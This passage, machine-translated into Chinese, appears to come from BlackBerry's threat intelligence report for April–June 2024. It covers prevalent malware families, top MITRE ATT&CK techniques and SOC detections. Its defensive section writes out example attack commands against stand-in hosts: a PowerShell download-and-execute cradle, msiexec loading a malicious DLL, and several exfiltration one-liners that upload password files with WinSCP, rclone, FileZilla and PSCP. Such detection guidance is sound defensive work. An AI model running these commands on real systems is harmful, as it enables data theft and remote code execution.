RisePro使用多种传播方式访问受害者的设备并收集敏感数据,然后发送回 C2 服务器。

信息窃取者

RedLine Stealer 使用各种应用程序和服务来收集受害者信息,如密码、cookies 和信用卡信息。

远程访问木马

Remcos 是远程控制和监视的简称,是一种用于远程访问受害者设备的应用程序。

远程访问木马

DCRat是一种远程访问木马,可从 C2 服务器窃取受害者信息并执行命令。据观察,DCRat 是通过 Signal 传播的。

僵尸网络

Amadey 是一个僵尸网络,它收集受害者信息,并等待 C2 服务器的命令来下载额外的有效载荷。

按平台划分的普遍威胁:Linux

特洛伊木马

在本报告所述期间,木马 XorDDos 在我们的遥测中仍然很普遍。XorDDos 使用 XOR 加密技术控制对通信和执行数据的访问,感染基于 Linux 的设备,并通过 C2 指令将其控制为一个单一的僵尸网络。

后门

BPFDoor 是一个 Linux 后门,它利用伯克利数据包过滤器 (BPF) 嗅探器拦截和修改网络流量。由于 BPFDoor 能够绕过防火墙而不被发现,因此被威胁组织 Red Menshen 用作被动监控工具。BPFDoor 的新变种采用了反向外壳通信并加强了加密。

僵尸网络

已检测到 Mirai 利用身份验证绕过漏洞访问端点,并利用命令注入漏洞交付和部署僵尸网络并接管易受攻击的设备。

僵尸网络

Bashlite 又名 Gafgyt,是另一个 Linux 僵尸网络,它使用 C2 服务器发送指令,由受感染的设备执行。据记录,它以路由器等物联网(IoT)设备为目标,并利用这些设备协调针对目标的大规模 DDoS 攻击。

Coinminer

XMRig 因其高性能和开源性,一直是挖掘 Monero 等加密货币的热门工具。一旦获得系统的初始访问权限,威胁者通常会部署该工具,并在受害者不知情的情况下挖掘加密货币。

按平台划分的普遍威胁:MacOS

偷窃者

Cuckoo Stealer 是由 Kandji 的威胁研究团队于今年 4 月发现并命名的,它以恶意磁盘镜像 (DMG) 文件的形式发布,其中包含间谍软件和信息窃取功能。自从发现 Cuckoo Stealer 以来,该恶意软件的新样本在野外急剧增加。

偷窃者

原子窃取程序(又名 AMOS)依然猖獗,野外发现了许多新变种。新变种伪装成各种应用程序,通过磁盘镜像分发。AMOS 是一种针对密码、浏览器 cookie、自动填充数据、加密钱包和 Mac 钥匙串数据的窃取程序。

后门

研究人员发现了一种利用 Python 包索引(PyPI)的恶意攻击。该恶意软件利用 PyPI 库在目标计算机上安装 Sliver C2 有效载荷。该软件包是用 Go 编程语言编写的,并使用便携式网络图形(PNG)文件中的隐写术来实施攻击。

偷窃者

该恶意软件利用弧形网页浏览器的恶意谷歌广告进行传播。这些广告会诱骗受害者下载一个恶意的 DMG 安装文件,该文件会启动感染过程,将恶意软件植入机器。Poseidon 能够获取用户凭据、VPN 配置和加密货币钱包。

按平台划分的普遍威胁:安卓

信息窃取者

该信息窃取程序利用 Android 辅助服务捕获用户数据,并将捕获的数据发送到其 C2 服务器。SpyNote 包括点击/长按,截图和锁定受害者屏幕的功能。

后门/勒索软件

Rafel RAT 以木马程序或网络钓鱼活动的形式发布。其功能包括 C2、位置跟踪、重定向设备通知,以及从目标设备中提取个人短信和通话记录。

信息窃取者

SoumniBot 可窃取银行密钥并掠夺受害者的银行账户。该恶意软件利用安卓系统清单中的验证问题,窃取信息并上传到远程服务器。

信息窃取者

Vultur 通过木马应用程序和 "smishing"(短信钓鱼)社交工程技术传播。除数据外泄外,威胁者还可利用 Vultur 更改文件系统、修改执行权限,并使用 Android 辅助功能服务控制受感染设备。

MITRE 常用技术

了解威胁组织的高级技术有助于决定哪些检测技术应优先使用。在本报告所述期间,BlackBerry 观察到威胁行为者正在使用以下前 20 种技术。
 

检测到的技术

下表显示了排名前 20 位的技术。变化 "一栏中的向上箭头(↑)表示自上次报告以来 该技术的使用率有所上升 。向下箭头(↓)表示 自上次报告以来使用率有所 下降。等号(=)表示该技术与上次报告中的位置相同。

技术名称 技术 ID 战术名称 最新报告 改变
劫持执行流程
T1574
持久性、特权升级、防御规避
NA
DLL 侧加载
T1574.002
持久性、特权升级、防御规避
3
工艺注入
T1055
特权升级、防御规避
1
输入捕捉
T1056
凭证访问,收集
4
=
发现系统信息
T1082
发现
2
软件发现
T1518
发现
NA
发现安全软件
T1518.001
发现
5
过程探索
T1057
发现
8
文件和目录发现
T1083
发现
7
伪装
T1036
防御回避
6
应用层协议
T1071
命令与控制
9
非应用层协议
T1095
命令与控制
11
远程系统发现
T1018
发现
12
启动或登录自动启动执行
T1547
持久性、特权升级
NA
注册表运行键/启动文件夹
T1547.001
持久性、特权升级
10
发现应用窗口
T1010
发现
13
损害防御
T1562
防御回避
NA
禁用或修改工具
T1562.001
防御回避
17
预定任务/工作
T1053
执行、持久性、权限升级
15
来自本地系统的数据
T1005
收藏品
NA
技术 ID
劫持执行流程
T1574
DLL 侧加载
T1574.002
工艺注入
T1055
输入捕捉
T1056
发现系统信息
T1082
软件发现
T1518
发现安全软件
T1518.001
过程探索
T1057
文件和目录发现
T1083
伪装
T1036
应用层协议
T1071
非应用层协议
T1095
远程系统发现
T1018
启动或登录自动启动执行
T1547
注册表运行键/启动文件夹
T1547.001
发现应用窗口
T1010
损害防御
T1562
禁用或修改工具
T1562.001
预定任务/工作
T1053
来自本地系统的数据
T1005
战术名称
劫持执行流程
持久性、特权升级、防御规避
DLL 侧加载
持久性、特权升级、防御规避
工艺注入
特权升级、防御规避
输入捕捉
凭证访问,收集
发现系统信息
发现
软件发现
发现
发现安全软件
发现
过程探索
发现
文件和目录发现
发现
伪装
防御回避
应用层协议
命令与控制
非应用层协议
命令与控制
远程系统发现
发现
启动或登录自动启动执行
持久性、特权升级
注册表运行键/启动文件夹
持久性、特权升级
发现应用窗口
发现
损害防御
防御回避
禁用或修改工具
防御回避
预定任务/工作
执行、持久性、权限升级
来自本地系统的数据
收藏品
最新报告
劫持执行流程
NA
DLL 侧加载
3
工艺注入
1
输入捕捉
4
发现系统信息
2
软件发现
NA
发现安全软件
5
过程探索
8
文件和目录发现
7
伪装
6
应用层协议
9
非应用层协议
11
远程系统发现
12
启动或登录自动启动执行
NA
注册表运行键/启动文件夹
10
发现应用窗口
13
损害防御
NA
禁用或修改工具
17
预定任务/工作
15
来自本地系统的数据
NA
改变
劫持执行流程
DLL 侧加载
工艺注入
输入捕捉
=
发现系统信息
软件发现
发现安全软件
过程探索
文件和目录发现
伪装
应用层协议
非应用层协议
远程系统发现
启动或登录自动启动执行
注册表运行键/启动文件夹
发现应用窗口
损害防御
禁用或修改工具
预定任务/工作
来自本地系统的数据

BlackBerry 威胁研究和情报团队使用MITRED3FEND™ 为本报告期内观察到的技术制定了一份完整的应对措施清单,该清单可在我们的公共 GitHub 上查阅。威胁者使用前三种最著名的技术来收集关键信息,从而成功实施攻击。在 "应用对策 "部分,我们将讨论这些技术的使用示例以及需要监控的有用信息。从图中可以看出所有技术和战术的影响等级。

图 17:2024 年 4 月至 6 月观察到的 MITRE ATT&CK 技术。

检测到的战术

在本报告期内,有两种策略的观察比例相同,即特权升级防御规避,占 23%,其次是发现策略,占 19%。与上一报告期相比,这些都是最常用的策略。

图 18:观察到的 MITRE ATT&CK 战术,2024 年 4 月至 6 月。

CylanceMDR 数据

报告的这一部分重点介绍了在本报告所述期间,在客户环境中观察到的最有趣的威胁检测。 CylanceMDR客户环境中发现的最有趣的威胁检测。

CylanceMDR 是一项基于订购的托管检测和响应 (MDR) 服务,提供全天候监控。它可以帮助企业阻止在客户安全计划中寻找漏洞的复杂网络威胁。BlackBerry MDR 团队在本报告期内跟踪了数千个警报。下面,我们将按地区对遥测数据进行细分,以提供对当前威胁状况的更多洞察。

图 19:按地区分列的五大CylanceMDR 警报。

CylanceMDR 意见

在本报告所述期间,与上一份报告类似,CylanceMDR 小组注意到 Certutil 仍是所有地区安全操作中心 (SOC) 的一个大检测源。

在北美/拉丁美洲 (NALA) 和欧洲、中东和非洲地区,我们还注意到与 "PowerShell 下载 "检测相关的活动趋势。例如,我们看到对手试图通过 PowerShell(如 powershell.exe -noexit -ep bypass -command IEX((New-Object System.Net.WebClient).DownloadString('hxxps://SourceofEvil/test[.]ps1'))使用下载平台来实现 MITRE 技术的入侵工具传输(T1105)。

此外,我们还发现 Base64 编码的检测次数有所增加,这在我们上一份报告的调查结果中并不常见。Base64 编码为威胁行为者提供了一种相对简单的方法来混淆代码、伪装恶意代码并降低其被检测的可能性。不过,大多数经验丰富的分析师都非常了解威胁行为者对 Base64 的使用,因此,较成熟的 SOC 通常会加入额外的警惕和检测功能,以识别这种规避技术。

在本报告所述期间,我们开始在 NALA 和亚太地区发现更多与 "可能通过 DLL 加载滥用 Msiexec "有关的检测,这一点尤其值得关注。Msiexec 是 Windows 中的一种命令行实用程序,通常与执行 .msi 安装包有关。我们的系统检测到威胁行为者试图滥用 Msiexec 代理执行恶意 DLL 有效负载(MITRE 技术 T1218.007)。看到的命令示例是:'C:\windows\system32\msiexec.exe /Z c:\programdata\evil.dll'。

LOLBAS 活动

在本报告所述期间,我们观察到以下离岸二进制文件、脚本和库(LOLBAS)活动:

  • Bitsadmin 仍然是观测到的最高 LOLBAS。
  • Certutil 紧随其后,而且自上一报告期以来有所增加。
  • 仍能观察到 Regsvr32、MSHTA 和 MOFCOMP,但总体比例较低。
图 20:2024 年 4 月至 6 月的 LOLBAS 活动。

渗透工具

上一份报告中,我们讨论了远程监控和管理 (RMM) 工具以及它们如何经常被威胁行为者滥用。RMM 工具为攻击者提供了一种保持持久性和易于访问的简便方法,同时也提供了一种从客户环境中轻松渗出数据的方法。事实上,据研究人员报告,RMM 工具是勒索软件集团从受害者环境中流出数据的增长最快的类别

在本报告所述期间,CylanceMDR 审查了客户环境中最常见的可用于外泄的工具(不包括 RMM 工具)。

图 21:CylanceMDR 检测到的外泄工具。

工具

WinSCP

说明 WinSCP 是一款文件传输客户端;PuTTY 是一款安全外壳(SSH)客户端。

命令行示例:winscp.exe scp://test:P@ss123[at]EvilHost[.]com:2222/ /upload passwords.txt /defaults=auto

注: 通常与图形用户界面(GUI)一起使用

斜切工具 ID:T1048

Rclone

简介Rclone 是一款命令行工具,用于管理云存储上的内容(即允许在云中传输文件)。

命令行示例:rclone.exe copy "\\SERVER\passwords\ ftp:EvilCorp\files" -q --transfers 10

斜切工具 ID:S1040

FileZilla

简介FileZilla 是一款著名的文件传输协议 (FTP) 工具,可用于各种操作系统。

命令行示例:filezilla.exe -u "ftp://test:p@ss1234[at]ftp.test[.]com" -e "put passwords.txt /remote_directory/pass.txt"

斜切铆钉和铆钉 ID:T1071.002T1071.002

PSCP

描述PuTTY Secure Copy Protocol(PSCP)是一款用于传输文件和文件夹的命令行工具。

命令行示例:pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp

斜切接头 ID:T1021.004T1021.004

FreeFileSync

说明FreeFileSync 是一款同步工具,可用于管理备份。

命令行示例:FreeFileSync.exe google_drive_sync.ffs_batch

Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder e.g., <Left Path=“C:\sensitiveFiles” /> <Right Path=“D:\GoogleDriveFolder” />

斜切工具 ID:T1567.002T1567.002

主要收获

上述工具清单并不详尽,因为用于外渗目的的工具有很多变种。因此,组织必须制定策略,防范可能被用于恶意目的的工具的使用。

这些战略可能包括

  • 数据丢失防护(DLP)工具,用于检测和防止敏感数据因泄露、未经授权的使用或外流而丢失、滥用或共享。
  • 静态和传输中加密
  • 访问控制。
  • "最低权限 "设置。只提供所需的访问权限。
  • 定期审核账户--例如,如果用户改变了角色,他们可能会访问他们不再需要的数据。
  • 网络分段,因为在发生入侵时,定义明确的网络分段会阻碍横向移动,减少攻击面。
  • 入侵检测系统,用于监控网络流量。
  • 采用默认拒绝方法--只在需要时启用。例如
    • 阻止使用 USB 端口或云存储服务。(例如,使用组策略对象 (GPO) 禁用 USB 端口的数据传输)。
    • 端口不应公开暴露在互联网上(例如,端口 22(SSH)不应向互联网开放)。
    • 通过限制端口、协议和服务的使用来降低整体风险。
  • 监控出站流量模式,例如
    • 正常运营时间以外的交通流量增加(偏离正常基线)。
    • 端口 22 上的出站流量突然增加可能表明有人使用 pscp.exe 等工具进行了外泄。
      • 如上所述,22 等端口应采用默认拒绝方法来防止此类风险。
  • 设置控制措施,监控已禁用端口或服务的出站尝试。
    • 例如,如果威胁行为者进入网络并试图启用这些端口或服务,那么这些控制措施就会向安全团队发出警报。         

从 SOC 分析师的角度来看,以下是分析师应该注意的一些例子:

工具重命名

分析人员需要了解常用的外渗工具及其选项和参数。以 Rclone 为例--"rclone.exe copy "\SERVER\passwords\ ftp:EvilCorp\files" -q --transfers 10"--威胁行为者可能会将其重命名为更无害的名称,如--"svchost.exe copy "\SERVER\passwords\ ftp:EvilCorp\files" -q --transfers 10"。

数据传输量

如果出现大量数据传输或向外流量突然增加的情况,分析人员应进行调查,特别是如果传输发生在核心业务时间之外。

异常流量

警惕来自未知 IP 或主机的意外数据传输模式。

用户行为分析

注意偏离常规的模式,如用户访问通常不需要访问的文件。例如,营销团队成员的主机访问客户财务记录。

结论和预测

本 90 天报告涵盖 2024 年 4 月至 6 月,旨在帮助您随时了解未来威胁并做好准备。备受瞩目的犯罪团伙,尤其是勒索软件运营商,正在利用新的漏洞,在大小目标中寻找价值。正如报告所指出的,BlackBerry 研究人员观察到平均每天捕获超过 11,500 个独特的恶意软件哈希值。如此频繁的活动使得了解行业和地区的最新安全新闻变得至关重要。

鉴于当前的网络威胁状况,我们预测未来几个月将面临以下威胁:

选举干扰
在全球范围内,2024 年是选举的重要一年,因为预计全球约 60% 的人口将参加投票。在这一年中,已经出现了误导、
虚假信息和干扰企图,包括通过相对较新的深度伪造媒介进行威胁。恶意行为者正越来越多地试图抓住时机制造混乱、煽动社会分裂并造成破坏。我们预测,他们将加强传播假新闻和错误信息的活动,并随着每次选举的临近而不断升级。

带有政治色彩的网络钓鱼诱饵
滥用带有政治色彩的帖子、论坛和邮件列表来传播恶意软件可能很快会成为一种武器化策略。通过利用各种政治圈子的两极分化观点,威胁行为者可能会利用这种混乱局面来传播感染了木马的政治资料,从而部署更多的恶意软件。常见的策略包括在社交媒体上发布虚假信息,并在社交媒体平台、即时通讯工具和传统新闻媒体上产生数百万次点击、浏览和参与。许多威胁行为者可能会利用这些社交媒体活动作为进行恶意软件攻击的诱饵。

混乱的武器化
在网络安全领域,任何类型的混乱都是恶意行为者利用混乱和错误信息的沃土。无论是战争、自然灾害、IT 中断,还是正常通信和数据流的任何重大中断,不稳定时期都为网络犯罪分子提供了大量机会。威胁行为者准备通过传播虚假的网络钓鱼电子邮件、误导性的论坛帖子以及伪装成有用的、与上下文相关的工具的恶意软件,不断利用这种情况。

勒索软件的演变与人工智能
面对全球执法部门、立法者和安全专业人员日益严格的审查,勒索软件
威胁行为者很可能会不断改进其战术、技术和程序(TTP),以继续开展业务。

这种演变可能涉及利用人工智能(特别是生成式人工智能)开发更复杂、更强大的有效载荷和执行链,利用深度伪造技术进行高级和有针对性的社会工程学攻击,分散和匿名化网络和 C2 基础设施以逃避跟踪和关闭,以及提高操作安全性。

访问BlackBerry 博客,了解网络安全威胁和防御的最新动态。

法律声明

BlackBerry Global Threat Intelligence Report 中包含的信息仅供参考之用。对于本报告中引用的任何第三方声明或研究的准确性、完整性和可靠性,BlackBerry 不作任何保证,也不承担任何责任。本报告中的分析反映了我们的研究分析人员目前对现有信息的理解,可能会随着我们了解到的更多信息而发生变化。读者有责任在其私人和职业生活中应用这些信息时进行尽职调查。BlackBerry 不允许恶意使用或滥用本报告中提供的信息。